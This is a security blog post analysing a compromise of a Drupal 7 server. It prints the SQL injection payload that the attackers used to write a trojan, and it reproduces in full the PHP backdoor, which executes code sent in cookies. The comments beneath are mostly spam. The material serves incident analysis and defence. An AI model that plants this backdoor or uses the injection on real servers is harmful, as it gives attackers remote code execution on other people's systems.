Automated exploiting and backdooring of Drupal 7 web servers

Today we were contacted by one of our Belgian partners that they wanted to patch a Drupal 7 server to protect against the latest vulnerability, released this week by Drupal Security.

The file was already patched, without knowledge of the customer and without finding traces in the Drupal management console.

Our partner investigated the access logs and they found strange requests from a Russian IP to this web server. They found this suspicious and contacted us.

Root-analysis, based on mininal log information available, revealed that the Drupal server was attacked and a backdoor was installed.

The criminals used an automated exploit based on proof-of-concept code and they used this to inject malicious PHP in Drupal.

The exploit tries to abuse the SQL Injection to insert data in the route tabel, Acquia has seen these attacks too:

INSERT INTO `menu_router` (`path`, `load_functions`, `to_arg_functions`, `description`, `access_callback`, `access_arguments`)

VALUES ('mziogj', '', '', 'mziogj', 'file_put_contents','[TROJAN]');

The back-door:

<?php $form1=@$_COOKIE["Kcqf3"]; if ($form1){ $opt=$form1(@$_COOKIE["Kcqf2"]); $au=$form1(@$_COOKIE["Kcqf1"]); $opt("/292/e",$au,292); } phpinfo();

So sending PHP code in the Cookie will have this executed on the Drupal web server. This PHP can be anything that will be executed on the web server. And is independent of the platform: Windows or Linux.

Several other people confirm this behavior on the Drupal page about the vulnerability:

There are 6 Comments

user picture

Thanks for sharing this article. Its really useful for who wish to learn software training.

user picture

MULTI TECHNO SYSTEMS training program are for all those who have basic knowledge of programming, multiple training process are available to provide training like online , offline training with suitable timing, for online training just you need to have a good internet connection. Our Contact numbers are open 24x7 feel free to contact us any time,

user picture

You know you are doing a good by providing us such a good information. Also your website has a good structure and very well maintained.

user picture

Thank you a lot for providing individuals with a very spectacular possibility to read critical reviews from this site.

<a href=" training in chennai</a>

user picture

I believe there are many more pleasurable opportunities ahead for individuals that looked at your site.

user picture

To check what files were modified you can use `git status`, otherwise use Hacked module (

Add comment